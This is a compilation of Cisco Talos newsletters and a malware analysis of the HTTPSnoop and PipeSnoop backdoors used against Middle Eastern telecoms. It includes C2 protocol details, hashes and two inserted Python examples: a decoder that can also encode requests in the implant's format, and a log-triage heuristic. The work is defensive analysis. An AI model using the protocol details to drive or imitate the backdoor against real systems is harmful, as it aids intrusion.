What’s the point of press releases from threat actors?

21 September 2023 at 18:00

Welcome to this week’s edition of the Threat Source newsletter.

As a former reporter, I’ve seen my fair share of press releases. But one from a threat actor was definitely a new one for me last week.

ALPHV (aka BlackCat) publicly took credit for a massive cyber attack against MGM, a resort, gambling and sports betting company best known for its massive casinos. The attack took down slot machines, guest reservation systems, and more belonging to MGM, and the company is still feeling the effects as of Tuesday.

And despite every major news outlet reporting on the incident, the actor wanted to take messaging into its own hands and “clarify” what happened exactly. Attackers have occasionally posted updates and pseudo-press releases in the past, but this particular press release on ALPHV’s leak site (don’t worry, I didn’t actually link to their site) was peak unintentional comedy to me.

For starters, the actor blamed MGM for not using their official communication channels to contact them to start negotiating a ransom payment:

“As they were not responding to our emails with the special link provided (In order to prevent other IT Personnel from reading the chats) we could not actively identify if the user in the victim chat was authorized by MGM Leadership to be present,” the statement reads.

They also said that, hypothetically, if personally identifiable information *had* been stolen, they would allow the website Have I Been Pwned? to responsibly disclose this information, even though they stopped short of saying they stole PII.

Lastly, they took a victory lap by saying several news outlets had reported false information, claimed attribution too early, or made ALPHV seem too basic of a threat actor because the tactics, techniques and procedures “used by the people they blame for the attacks are known to the public and are relatively easy for anyone to imitate.”

The entire statement reads as if it were written by someone who thinks they’ve done nothing wrong, and it is certainly written to intimate that the situation could have gone much more smoothly had MGM just reached out to the threat actor early on through what ALPHV deems the appropriate channels and negotiated early.

So, it makes me wonder what ALPHV thinks they’re gaining from all this. Part of me wonders if they were upset that public reporting had connected the attack to a group called “Scattered Spider” and they wanted to make sure everyone knew who deserved the credit. Or it could have been that they wanted to turn up the heat on MGM representatives and apply public pressure to hopefully get them to communicate and settle on a ransom payment.

It reads as if ALPHV really wants to come across as the “good guys” in this case, but I’m not sure who outside of dark web circles would be willing to feel sorry for them.

The one big thing

Talos researchers recently discovered a new malware family we’re calling “HTTPSnoop” being deployed against telecommunications providers in the Middle East. HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint. We also discovered a sister implant to “HTTPSnoop” we’re naming “PipeSnoop,” which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint. All these new tools are linked to a group we’re calling “ShroudedSnooper.”

Why do I care?

This activity is a continuation of a trend we have been monitoring over the last several years in which sophisticated actors are frequently targeting the telecommunications sector. This sector was consistently a top-targeted industry vertical in 2022, according to Cisco Talos Incident Response data. However, since this is a new, relatively unknown group, we can’t be certain that they’ll only stick to targeting this particular field. The various malware at their disposal can leave a backdoor on infected machines for future attacks and malware installations and execute arbitrary shellcode on the infected endpoint.

So now what?

We found specific URL patterns that make it look like the infected system being contacted is a server hosting Microsoft’s Exchange Web Services (EWS) API. The URLs consisted of “ews” and “autodiscover” keywords over ports 443 and 444. The blog post has a list of these patterns so potentially affected targets can scan to see if they’re infected. There is also a host of detection content available for Cisco Secure products.

Top security headlines of the week

Apple released long-awaited updates to its “Lockdown Mode” with iOS 17 this week, its answer to a recent global uptick in spyware attacks. Lockdown Mode now also works on Apple Watches, in addition to iPhones and iPads, which is notable because threat actors have increasingly started targeting Apple Watches with spyware. New features also remove geolocation information from photos when Lockdown Mode is enabled and automatically block insecure Wi-Fi networks. Apple and other cellphone manufacturers are working on addressing the use of cell site simulators, also known as “stingrays.” These fake cell base stations track phone locations and spy on calls and messages after a device connects to them. Google also announced new features earlier this year that ensure their devices’ communications are always encrypted when connecting to cell towers. (TechCrunch, Electronic Frontier Foundation)

The U.S. Cybersecurity and Infrastructure Security Agency announced a new program offering free security scans to public water utilities and other critical infrastructure. CISA is offering to run specialized scanners to identify a facility’s vulnerabilities and any weak configurations on internet-exposed endpoints. Then, they generate a report of any flaws or vulnerabilities found and send the plant a list of recommendations and offers for further scans to determine if the potential target has taken the appropriate steps to solve the issues. A brochure for the new program promises a “significant reduction in identified vulnerabilities in the first few months of scanning for newly enrolled water utilities.” (StateScoop, CISA)

China’s government has accused the U.S. of a campaign to infiltrate servers belonging to tech company Huawei to conduct cyber attacks and steal information, potentially as far back as 2009. China’s Ministry of State Security outlined the accusations in a post on its WeChat account on Wednesday. “In 2009, the Office of Tailored Access Operations started to infiltrate servers at Huawei’s headquarters and continued conducting such surveillance operations,” the post reads. China and the U.S. have continually launched accusations of spying on one another this year as tensions between the two nations rise. China also accused the U.S. National Security Agency of installing a backdoor tool that “runs secretly on thousands of network devices in many countries around the world” meant to steal data from other governments, including China and Russia. (Nikkei Asia, The Register)

Can’t get enough Talos?

Upcoming events where you can find Talos

LABScon (Sept. 20 - 23)

Scottsdale, Arizona

Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having fully working spyware targeting iOS and Android with a one-click zero-day exploit.

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MITRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often techniques are thrown at the bottom of reports and blogs without any context, never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week

SHA 256: 7f66d4580871e3ee6a35c8fef6da7ab26a93ba36b80279625328aaf184435efa
MD5: e9a6b1346d1a2447cabb980f3cc5dd27
Typical Filename: профиль 10 класс.exe
Claimed Product: N/A
Detection Name: Application_Blocker

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934
MD5: 93fefc3e88ffb78abb36365fa5cf857c
Typical Filename: Wextract
Claimed Product: Internet Explorer
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

SHA 256: bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a
MD5: 200206279107f4a2bb1832e3fcd7d64c
Typical Filename: lsgkozfm.bat
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::tpd

SHA 256: e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c
MD5: a087b2e6ec57b08c0d0750c60f96a74c
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Tool.Kmsauto::1201

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::1201

New ShroudedSnooper actor targets telecommunications firms in the Middle East with novel Implants

19 September 2023 at 12:00
  • Cisco Talos recently discovered a new malware family we’re calling “HTTPSnoop” being deployed against telecommunications providers in the Middle East.
  • HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.
  • We also discovered a sister implant to “HTTPSnoop” we’re naming “PipeSnoop,” which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint.
  • We identified DLL- and EXE-based versions of the implants that masquerade as legitimate security software components, specifically extended detection and response (XDR) agents, making them difficult to detect.
  • We assess with high confidence that both implants belong to a new intrusion set we’re calling “ShroudedSnooper.” Based on the HTTP URL patterns used in the implants, such as those mimicking Microsoft’s Exchange Web Services (EWS) platform, we assess that this threat actor likely exploits internet-facing servers and deploys HTTPSnoop to gain initial access.
  • This activity is a continuation of a trend we have been monitoring over the last several years in which sophisticated actors are frequently targeting telecoms. This sector was consistently a top-targeted industry vertical in 2022, according to Cisco Talos Incident Response data.

ShroudedSnooper activity highlights latest threat to telecommunications entities

This specific cluster of implants involving HTTPSnoop and PipeSnoop, and the associated tactics, techniques, and procedures (TTPs), does not match a known group that Talos tracks. We are therefore attributing this activity to a distinct intrusion set we’re calling “ShroudedSnooper.”

In recent years, there have been many instances of state-sponsored actors and sophisticated adversaries targeting telecommunications organizations around the world. In 2022, this sector was consistently a top-targeted vertical in Talos IR engagements. Telecommunications companies typically control a vast number of critical infrastructure assets, making them high-priority targets for adversaries looking to cause significant impact. These entities often form the backbone of national satellite, internet and telephone networks upon which most private and government services rely. Furthermore, telecommunications companies can serve as a gateway for adversaries to access other businesses, subscribers or third-party providers.

Our IR findings are consistent with reports from other cybersecurity firms outlining various attack campaigns targeting telecommunications companies globally. In 2021, CrowdStrike disclosed a years-long campaign by the LightBasin (UNC1945) advanced persistent threat (APT) targeting 13 telecommunications companies globally using Linux-based implants to maintain long-term access in compromised networks. That same year, McAfee discovered activity targeting telecommunication firms in Europe, the U.S. and Asia dubbed “Operation Diànxùn” linked to the Chinese APT group Mustang Panda (RedDelta). This campaign heavily relied on the PlugX malware implant. Also in 2021, Recorded Future reported that four distinct Chinese state-sponsored APT groups were targeting the email servers of a telecommunications firm in Afghanistan, again using the PlugX implant.

The targeting of telecommunications firms in the Middle East is also quite prevalent. In January 2021, Clearsky disclosed the “Lebanese Cedar” APT leveraging web shells and the “Explosive” RAT malware family to target telecommunication firms in the U.S., U.K. and the Middle East. In a separate campaign, Symantec noted the MuddyWater APT targeting telecommunication organizations in the Middle East, deploying web shells on Exchange Servers to instrument script-based malware and dual-use tools to carry out hands-on-keyboard activity.

Masquerading as a security component

We also discovered both HTTPSnoop and PipeSnoop masquerading as components of Palo Alto Networks’ Cortex XDR application. The malware executable is named “CyveraConsole.exe,” which is the application that contains the Cortex XDR agent for Windows. The variants of both HTTPSnoop and PipeSnoop we discovered had their compile timestamps tampered with but masqueraded as the XDR agent from version 7.8.0.64264. Cortex XDR v7.8 was released on Aug. 7, 2022, and decommissioned on April 24, 2023. Therefore, it is likely that the threat actors operated this cluster of implants during that timeframe. For example, one of the “CyveraConsole.exe” implants was compiled on Nov. 16, 2022, falling approximately in the middle of the life of Cortex XDR v7.8.

Figure: Version information of HTTPSnoop sample with fake Cortex XDR information.

A primer on HTTPSnoop

HTTPSnoop is a simple, yet effective, new backdoor that uses low-level Windows APIs to interact directly with the HTTP device on the system. It leverages this capability to bind specific HTTP(S) URL patterns on the endpoint and listen for incoming requests. Any incoming requests for the specified URLs are picked up by the implant, which then proceeds to decode the data accompanying the HTTP request. The decoded HTTP data is, in fact, shellcode that is then executed on the infected endpoint.

HTTPSnoop consists of the same code across all observed variants, with the key difference in samples being the URL patterns that it listens for. So far, we have discovered three variations in the configuration:

  • Generic HTTP URL-based: Listens for generic HTTP URLs specified by the implant.
  • EWS-related URL listener: Listens for URLs that mimic Microsoft’s Exchange Web Services (EWS) API.
  • OfficeCore’s Location Based Services (LBS)-related URL listener: Listens for URLs that mimic OfficeCore’s LBS/OfficeTrack and telephony applications.

HTTPSnoop variants

The DLL-based variants of HTTPSnoop usually rely on DLL hijacking in benign applications and services to get activated on the infected system. The attackers initially crafted the first variant of the implant on April 17, 2023, so that it could bind to specific HTTP URLs on the endpoint to listen for incoming shellcode payloads that are then executed on the infected endpoint. These HTTP URLs resemble those of Microsoft’s Exchange Web Services (EWS) API, a product that enables applications to access mailbox items.

A second variant, generated on April 19, 2023, is nearly identical to the initial version of HTTPSnoop from April 17. The only difference is that this second variant is configured to listen to a different set of HTTP URLs on Ports 80 and 443 exclusively, indicating that the attackers may have intended to focus on a separate non-EWS internet-exposed web server.

The attackers then built a third variant that consisted of a killswitch URL and one other URL that the implant listens to. This implant was crafted on April 29, 2023. This version of the implant was likely an effort to minimize the number of URLs that the implant listens to, to reduce the likelihood of detection.

HTTPSnoop analysis

The DLL analyzed simply consists of two key components:

  • Encoded Stage 2 shellcode.
  • Encoded Stage 2 configuration.

On activation, the malicious DLL XOR-decodes the Stage 2 configuration and shellcode and runs it.

Figure: Single-byte XOR routine to decode Stage 2 components.

Stage 2 analysis

Stage 2 is a single-byte XOR’ed backdoor shellcode that uses the accompanying configuration data to listen for incoming shellcode to execute on the infected endpoint. As part of Stage 2, the sample proceeds to make numerous calls to kernel devices in order to set up a web server endpoint for its backdoor. The implant opens a handle to “\Device\Http\Communication” and calls the HTTP driver API “http.sys!UlCreateServerSession” with IOCTL code 0x1280000 to initialize the connection to the HTTP server. The sample continues by creating a new URL group using http.sys!UlCreateUrlGroup with IOCTL code 0x128010, opens a request queue device “\Device\Http\ReqQueue” and sets the new URL group for the session using http.sys!UlSetUrlGroup with IOCTL code 0x12801d.

Using the decrypted configuration, the sample begins to feed the URLs to the HTTP server via http.sys!UlAddUrlToUrlGroup with IOCTL code 0x128020. This binds the specified URL patterns to a listenable endpoint over which the malware can communicate. The implant takes care not to overwrite already existing URL patterns being serviced by the HTTP server, so that it coexists with previous configurations on the server, such as EWS, and prevents URL listener collisions.

With the URLs bound to listen on the kernel’s web server, the malware proceeds to listen in a loop for incoming HTTP requests, carried out via http.sys!UlReceiveHttpRequest. If the headers from the HTTP request contain a configured keyword, in this particular sample’s case “api_delete”, the listening loop for the infection will terminate. Once a request comes in, it creates a new thread and calls http.sys!UlReceiveEntityBody with IOCTL code 0x12403b, or 0x12403a when running Windows Server 2022 version 21H2, to receive the full message body from the implant operator. If the request has valid data, the sample proceeds to process the request; otherwise it returns an HTTP 302 Found redirect response to the requester.

Valid data comes in the form of a base64-encoded request body. Upon decoding, the implant uses the first byte of the data as the key to single-byte XOR-decode the rest of the data. Once decrypted, a simple data structure is revealed. The payload received from the operator is an arbitrary shellcode payload. The execution metadata consists of an uninitialized pointer and size, plus the size of the metadata structure, which is a constant 0x18. These uninitialized fields are populated by the execution of the shellcode and used to pass data back to the implant, which eventually sends it to the operator as the response to the HTTP request.

Figure: Payload structure from C2.

The ultimate result of the execution of the arbitrary shellcode is returned to the requester (operator) in the form of a base64-encoded XOR-encoded blob. The first byte of the response is a random letter from the ASCII table, which is used to XOR the rest of the response. With this, the malware sends back a 200 OK response with the encoded execution result in its body via http.sys!UlSendHttpResponse with IOCTL code 0x12403f.
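The decoding described for the Stage 2 components and for the C2 exchange above is simple enough to reproduce in analyst tooling. The Python below is an added example, not code from Talos or from the implant: it recovers the single-byte XOR key of an embedded Stage 2 configuration by searching for the kill-switch keyword the post names (“api_delete”), and decodes a captured request or response body the way the post describes (base64, then XOR with the leading byte). The layout of the 0x18-byte metadata as three little-endian 64-bit fields (result pointer, result size, structure size) is an assumption made here for illustration; the post only gives the structure’s total size. All sample inputs are constructed.

```python
import base64
import struct
from typing import Optional

# Size of the execution metadata structure reported in the analysis (0x18 bytes).
METADATA_SIZE = 0x18


def xor_single_byte(data: bytes, key: int) -> bytes:
    """Single-byte XOR, as used for both the Stage 2 components and the C2 bodies."""
    return bytes(b ^ key for b in data)


def recover_stage_key(encoded: bytes, known_plaintext: bytes) -> Optional[int]:
    """Brute-force the single-byte key of an embedded Stage 2 blob.

    The Stage 2 configuration holds the listener's kill-switch keyword
    ("api_delete" in the analysed sample), so the right key is the one under
    which the decoded blob contains that keyword. Returns None if no key fits.
    """
    for key in range(256):
        if known_plaintext in xor_single_byte(encoded, key):
            return key
    return None


def encode_blob(key: int, plain: bytes) -> bytes:
    """Wire encoding in reverse: XOR with key, prepend the key byte, base64.

    Used here only to build CONSTRUCTED samples for exercising the decoders.
    """
    return base64.b64encode(bytes([key]) + xor_single_byte(plain, key))


def build_constructed_request(key: int, payload: bytes) -> bytes:
    """CONSTRUCTED request body: zeroed pointer/size, constant structure size, payload.

    Field order and widths are an ASSUMPTION; in a real capture the pointer and
    size fields are uninitialized and may hold arbitrary values.
    """
    plain = struct.pack("<QQQ", 0, 0, METADATA_SIZE) + payload
    return encode_blob(key, plain)


def decode_c2_request(body: bytes) -> dict:
    """Decode an operator request body: base64, then XOR with its first byte."""
    raw = base64.b64decode(body, validate=True)
    if len(raw) < 1 + METADATA_SIZE:
        raise ValueError("body too short to hold a key byte and the metadata")
    key = raw[0]
    plain = xor_single_byte(raw[1:], key)
    # ASSUMED layout: three little-endian 64-bit fields, then the shellcode.
    result_ptr, result_size, struct_size = struct.unpack_from("<QQQ", plain, 0)
    return {
        "key": key,
        "result_ptr": result_ptr,
        "result_size": result_size,
        "struct_size": struct_size,
        "payload": plain[METADATA_SIZE:],
        # A structure size of 0x18 is the cheapest sanity check that this body
        # really follows the described format and is not an ordinary request.
        "plausible": struct_size == METADATA_SIZE,
    }


def decode_c2_response(body: bytes) -> bytes:
    """Decode a 200 OK body: base64, then XOR with the leading random ASCII letter."""
    raw = base64.b64decode(body, validate=True)
    if not raw:
        raise ValueError("empty response body")
    return xor_single_byte(raw[1:], raw[0])


if __name__ == "__main__":
    # CONSTRUCTED Stage 2 configuration: the kill-switch keyword XORed with 0x5A.
    encoded_config = xor_single_byte(b"\x00\x00api_delete\x00", 0x5A)
    print("recovered Stage 2 key:", hex(recover_stage_key(encoded_config, b"api_delete")))

    # CONSTRUCTED request and response bodies, decoded back to their fields.
    request = build_constructed_request(0x41, b"CONSTRUCTED-PAYLOAD")
    print("decoded request:", decode_c2_request(request))
    response = encode_blob(ord("q"), b"CONSTRUCTED-RESULT")
    print("decoded response:", decode_c2_response(response))
```

Running the script prints the recovered key and the decoded fields for the constructed samples. On a real capture, the `plausible` flag (structure size equal to 0x18 after decoding) is a quick way to separate implant traffic from legitimate EWS requests to the same URL before spending time on the payload.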

Introducing PipeSnoop

The PipeSnoop implant, created in May 2023, is a simple implant that can run arbitrary shellcode payloads on the infected endpoint by reading from an IPC pipe. Although semantically similar, the PipeSnoop implant should not be considered an upgrade of HTTPSnoop. Both implants are likely designed to work under different environments. The HTTP URLs used by HTTPSnoop, along with the binding to the built-in Windows web server, indicate that it was likely designed to work on internet-exposed web and EWS servers. PipeSnoop, however, as the name may imply, reads and writes to and from a Windows IPC pipe for its input/output (I/O) capabilities. This suggests the implant is likely designed to function further within a compromised enterprise, instead of on public-facing servers like HTTPSnoop, and is probably intended for use against endpoints the malware operators deem more valuable or high-priority. PipeSnoop is likely used in conjunction with another component that is capable of feeding it the required shellcode. (This second component is currently unknown.)

PipeSnoop analysis

PipeSnoop is a simple backdoor that, much like HTTPSnoop, aims to act as a backdoor executing arbitrary shellcode on the infected endpoint. In contrast to HTTPSnoop, however, PipeSnoop does not rely on initiating and listening for incoming connections via an HTTP server. As indicated by the name, PipeSnoop will simply attempt to connect to a pre-existing named pipe on the system. Named pipes are a common means of Inter-Process Communication (IPC) on the Windows operating system. The key requirement here is that the named pipe that PipeSnoop connects to should have been already created/established - PipeSnoop does not attempt to create the pipe, it simply tries to connect to it. This capability indicates that PipeSnoop cannot function as a standalone implant (unlike HTTPSnoop) on the endpoint. It needs a second component that acts as a server, obtains arbitrary shellcode via some method and then feeds the shellcode to PipeSnoop via the named pipe.

Figure: Implant connecting to a named pipe to obtain arbitrary shellcode.

Masquerading as benign traffic on the wire

We’ve observed HTTPSnoop listening for URL patterns that make it look like the infected system being contacted is a server hosting Microsoft’s Exchange Web Services (EWS) API. The URLs consisted of “ews” and “autodiscover” keywords over ports 443 and 444:

Figure: EWS-style URL patterns used by HTTPSnoop (image not reproduced here).

Some of the HTTPSnoop implants use HTTP URLs that masquerade as those belonging to OfficeTrack, an application developed by software company OfficeCore that helps users manage different administrative tasks. In several instances, we see URLs ending in “lbs” and “LbsAdmin,” references to the application’s earlier name (OfficeCore’s LBS System) before it was later rebranded as OfficeTrack. OfficeTrack is currently marketed as a workforce management solution geared toward providing coverage for logistics, order orchestration and equipment control. OfficeTrack is especially marketed towards telecommunication firms. Some of the LBS URLs used by HTTPSnoop are:

Figure: OfficeTrack/LBS-style URL patterns used by HTTPSnoop (image not reproduced here).

The HTTP URLs also consist of patterns mimicking provisioning services from an Israeli telecommunications company. This telco may have used OfficeTrack in the past and/or currently uses this application, based on open-source findings.

Some of the URLs in the HTTPSnoop implant are also related to those of systems from the telecommunications firm:

Figure: URL patterns related to the telecommunications firm’s systems (image not reproduced here).
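The URL keywords the post lists (“ews”, “autodiscover”, “lbs”, “LbsAdmin”), the two ports it names, and the 302 Found answer the implant gives to malformed requests are enough for a first-pass triage of web server or proxy logs. The Python below is an added example, not Talos tooling: it scans constructed log lines in a simplified “time client host port method path status” format and flags requests worth an analyst’s attention. The flags are review heuristics, not detections, and the `officetrack_hosts` parameter is an assumed allow-list of systems known to run OfficeTrack so that legitimate LBS traffic can be excluded.

```python
import re
from dataclasses import dataclass, field
from typing import List, Set

# Keywords the blog reports in HTTPSnoop listener URLs, and the ports it names.
EWS_KEYWORDS = ("ews", "autodiscover")
LBS_KEYWORDS = ("lbs", "lbsadmin")
IMPLANT_PORTS = {443, 444}

# CONSTRUCTED log lines: "time client host port method path status".
SAMPLE_LOG = """\
2023-04-20T10:15:02Z 203.0.113.7 mail01 443 POST /ews/exchange.asmx 200
2023-04-20T10:15:09Z 203.0.113.7 mail01 444 POST /ews/exchange.asmx 200
2023-04-20T10:16:31Z 198.51.100.4 mail01 443 GET /autodiscover/autodiscover.xml 401
2023-04-20T10:17:05Z 203.0.113.7 mail01 443 POST /autodiscover/autodiscover.xml 302
2023-04-20T10:18:44Z 203.0.113.7 web02 443 POST /lbs/api/update 200
2023-04-20T10:19:10Z 192.0.2.9 www01 443 GET /index.html 200
"""

LOG_RE = re.compile(
    r"^(?P<time>\S+) (?P<client>\S+) (?P<host>\S+) (?P<port>\d+) "
    r"(?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$"
)


@dataclass
class Finding:
    line_no: int
    path: str
    reasons: List[str] = field(default_factory=list)


def triage_log(text: str, officetrack_hosts: Set[str] = frozenset()) -> List[Finding]:
    """Return one Finding per log line that matches an HTTPSnoop-related heuristic."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real tool would count these
        port = int(m["port"])
        if port not in IMPLANT_PORTS:
            continue
        path = m["path"].lower()
        method, status, host = m["method"], int(m["status"]), m["host"]
        ews_like = any(k in path for k in EWS_KEYWORDS)
        lbs_like = any(k in path for k in LBS_KEYWORDS)
        reasons = []
        # EWS is normally served on 443; an EWS-looking path on 444 stands out.
        if ews_like and port == 444:
            reasons.append("EWS-style path on port 444, which is not a usual EWS port")
        # The blog notes the implant answers requests without valid data with 302 Found.
        if ews_like and method == "POST" and status == 302:
            reasons.append("POST to EWS-style path answered with 302 Found")
        # OfficeTrack/LBS paths only make sense on hosts that actually run it.
        if lbs_like and host not in officetrack_hosts:
            reasons.append("OfficeTrack/LBS-style path on a host not known to run OfficeTrack")
        if reasons:
            findings.append(Finding(line_no, m["path"], reasons))
    return findings


if __name__ == "__main__":
    for f in triage_log(SAMPLE_LOG, officetrack_hosts={"ot01"}):
        print(f"line {f.line_no}: {f.path}")
        for r in f.reasons:
            print("   -", r)
```

On the constructed sample this flags the EWS request on port 444, the POST to autodiscover that drew a 302, and the LBS-style request to a host not in the allow-list, while leaving the ordinary 200 and 401 EWS traffic alone. The point is to shrink the review set, not to decide; a flagged host still needs its http.sys URL registrations and binaries examined.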

Coverage

Ways our customers can detect and block this threat are listed below.

Figure: Cisco Secure product coverage table (image not reproduced here).

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Note: We have shared our findings with both Microsoft and Palo Alto Networks for this threat and intrusion set.

ClamAV detections are available for this threat:
Win.Trojan.WCFBackdoor

Indicators of Compromise (IOCs)

Indicators of Compromise associated with this threat can be found here.

Turns out even the NFL is worried about deepfakes

14 September 2023 at 18:00

Welcome to this week’s edition of the Threat Source newsletter.

I’m at the point in the calendar year where I’m a sponge for NFL content. I couldn’t be happier to escape from my six-month American football-free slumber and am ready to watch games three days a week and listen to NFL podcasts or read power rankings the other four.

So of course, I wasn’t going to miss this feature in Dark Reading from the NFL’s chief information security officer, which just happens to include several shoutouts to Talos and Cisco. Talos is a valuable security partner with the NFL, helping secure their major events like the NFL Draft and Super Bowl, the most-watched entertainment event in the U.S. every year.

One of the things that Tomás Maldonado said in the Dark Reading interview really stood out to me: he’s worried about deepfakes of NFL players being used in scams. Deepfakes have been making the rounds for years in scams of celebrities and politicians seeming to ask for various things (often money), and Maldonado said he’s worried that attackers could start using the likenesses of popular NFL players for scams and spam.

I actually hadn’t realized that deepfakes had already been around in the NFL sphere for a while, though.

In an ESPN “30 for 30” documentary in 2021, the creators used deepfake AI voices for former Raiders owner Al Davis and former commissioner Pete Rozelle, who both died many years before the creation of this documentary. Public reception was mixed, at best.

The league’s Dallas Cowboys are also jumping on the AI train and created a hologram, AI-powered version of team owner Jerry Jones. Fans can pay $55 to take a tour of the Cowboys’ AT&T Stadium and ask the AI version of Jones questions (as a Browns fan, I mainly would just like to thank him for only asking for a fifth-round pick in exchange for receiver Amari Cooper).

Bad actors have shown they will literally use any and all forms of deepfakes to try and trick users. So it’s not hard to see where Maldonado is coming from with his concerns.

With the popularity of pay-for-shoutout services like Cameo, it’d be fairly easy for someone to develop a convincing enough deepfake of a player and try to steal someone’s money by saying they could prank their fantasy football league for $50. This just isn’t a particular attack vector I had considered before: I always assumed deepfakes were reserved for political leaders or some of the highest-profile people in the world.

And while I couldn’t find any current examples of this actively happening in the wild, it’s not a crazy jump to think that, if ESPN can create a convincing AI version of Al Davis, someone else can make an AI voice that sounds just like Aaron Rodgers asking for money or a fake Russell Wilson pushing season ticket “deals.”

The one big thing

Microsoft disclosed two zero-day vulnerabilities as part of its monthly security update on Tuesday, one of which already has proof-of-concept code floating around in the wild. There are five other critical vulnerabilities included in September’s Patch Tuesday, which is relatively low for a traditional Microsoft security release, and 56 vulnerabilities the company considers “important.”

Why do I care?

One of the vulnerabilities adversaries are already exploiting in the wild is CVE-2023-36802, an elevation of privilege vulnerability in Microsoft Streaming Service, a corporate video sharing platform integrated into SharePoint and Office 365. An adversary who successfully exploits this vulnerability can gain SYSTEM privileges. Additionally, CVE-2023-36761 has already been exploited in the wild and proof of concept code is publicly available. Although it is not clear how exactly an attacker could exploit this vulnerability in Microsoft Word, Microsoft states that the Preview Pane is also a potential attack vector in this case. If successful, an adversary could view NTLM hashes. Microsoft’s warnings about these vulnerabilities indicate attackers are already exploiting these issues in the wild, even prior to Tuesday’s patch, so all users should be sure to patch these ASAP.

So now what?

Microsoft’s security update guide has all the patches users need to install, which everyone should do now if they haven’t already. Talos’ Patch Tuesday blog also outlines several Snort rules we released to detect the exploitation of some of these vulnerabilities.

Top security headlines of the week

Apple released a series of security updates over the past week that users of all the company’s mobile devices are encouraged to install as soon as possible. A security update on Sept. 7 warned that users needed to update to iOS 16.6.1 or iPadOS 16.6.1 right away to fix vulnerabilities that attackers were actively exploiting in the wild. In some cases, these exploits led to the installation of spyware on targeted devices. Apple said in an advisory that, “Processing a maliciously crafted image may lead to arbitrary code execution.” The company followed that up with another security update on Monday for older models of iPhones, iPads, Macs and other Apple devices that “provides important security fixes,” likely for the same vulnerabilities. Apple was scheduled to announce its newest iPhone and Apple Watch at an event Wednesday. (USA Today, CNET)

The U.S. and U.K. have sanctioned more alleged members of the Trickbot cybercrime ring. Law enforcement officials in both countries announced sanctions against 11 individuals they claim are “involved in management and procurement for the Trickbot group.” Trickbot is known for targeting large businesses and organizations with ransomware and has alleged ties to the Russian government. Seven of the people listed are also charged with working with the Conti ransomware group, which shut down in 2022. These people are alleged "administrators, managers, developers, and coders” for Conti. The U.K.’s National Crime Agency reported that Trickbot attacks have generated an estimated $180 million from victims, $33.6 million of that coming from victims in the U.K. The group’s list of reported victims includes hospitals, schools and government agencies across the globe. (TechCrunch, Dark Reading)

Security researchers are concerned that adversaries have begun cracking password vaults stolen during the 2022 data breach at LastPass. More than 150 people recently affected by cryptocurrency wallet thefts were LastPass users, and the equivalent of roughly $35 million in virtual currency was stolen from them. Many cryptocurrency users protect their wallets with a seed phrase and then store that phrase in an encrypted entry inside a password manager like LastPass. An attacker who learns the phrase can access every wallet tied to it. LastPass has yet to comment on the researchers’ findings, citing the ongoing law enforcement investigation into the 2022 breach. (Krebs on Security, The Verge)

Can’t get enough Talos?

Upcoming events where you can find Talos

LABScon (Sept. 20 - 23)

Scottsdale, Arizona

Vitor Ventura gives a detailed account and timeline of a mercenary spyware organization, from near bankruptcy to having fully working spyware targeting iOS and Android with one-click zero-day exploits.

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

